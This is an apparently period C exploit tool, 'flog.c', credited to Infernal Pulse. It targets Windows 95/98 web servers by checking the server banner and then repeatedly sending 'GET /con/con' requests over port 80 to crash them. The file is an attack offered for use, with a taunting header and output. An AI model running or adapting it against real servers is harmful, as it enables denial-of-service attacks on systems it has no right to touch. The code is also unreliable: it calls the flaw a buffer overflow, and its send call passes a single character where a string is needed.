/*
 * [flog.c]
 * A remote buffer overflow that affects all Win95/98/se machines 
 * running a webserver using the unexisting /con/con exploit.
 *
 * by Infernal Pulse
 * infernal@hackdesk.com
 * http://www.hackdesk.com
 *
 * Greets
 *  R00T-dude - For the idea.
 *  All of the Hack Desk staff... 
 *
 * NOTE: Does not work on Windows NT 4 or Windows 2000 web servers.
 *
 */

#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

void main(int argc, char *argv[])
{
  int sock,debugm=0;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,crap=0;
  char conbuff[1024];
  char *buff;
  buff = "GET /con/con HTTP/1.0\n\n";

  if (argc<2)
    {
      printf("\n [flog.c] by Infernal Pulse ");
      printf("\n Exploits the /con/con vulnerability on Win9x webservers. ");
      printf("\n Usage: %s host",argv[0]);
      exit(0);
    }
  if (argc>2)
    {
      if(strstr("-d",argv[2]))
        {
          debugm=1;
        }
    }
  if ((he=gethostbyname(argv[1])) == NULL)
    {
      herror("gethostbyname");
      exit(0);
    }

  printf("\n\n\t                flog.c by Infernal Pulse \n\n\n");
  start=inet_addr(argv[1]);
  counter=ntohl(start);

  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
      perror("connect");
    }
  printf("\n\n\t Checking webserver version... \n");
  getchar();
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  recv(sock, buffer, sizeof(buffer),0);
  printf("%s",buffer);
  close(sock);

  printf("\n\t Executing code... *fl0g* *fl0g* *fl0g* \n");
  getchar();

  while(count++ < 97)
    {
      sock=socket(AF_INET, SOCK_STREAM, 0);
      bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
      sin.sin_family=AF_INET;
      sin.sin_port=htons(80);
      if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
        {
          perror("connect");
        }
      printf("fl0g - error");

      for(numin=0;numin < 1024;numin++)
        {
          conbuff[numin] = '\0';
        }

      send(sock, buff[count],strlen(buff[count]),0);
      recv(sock, conbuff, sizeof(conbuff),0);
      cgistr = strstr(conbuff,foundmsg);
      printf("Finished fl0ggin'!\n");
      close(sock);
    }
  if (crap)
    {
      printf("fl0g dem Windows kiddies!\n");
    }
}
/*                    www.hack.co.za              [2000]*/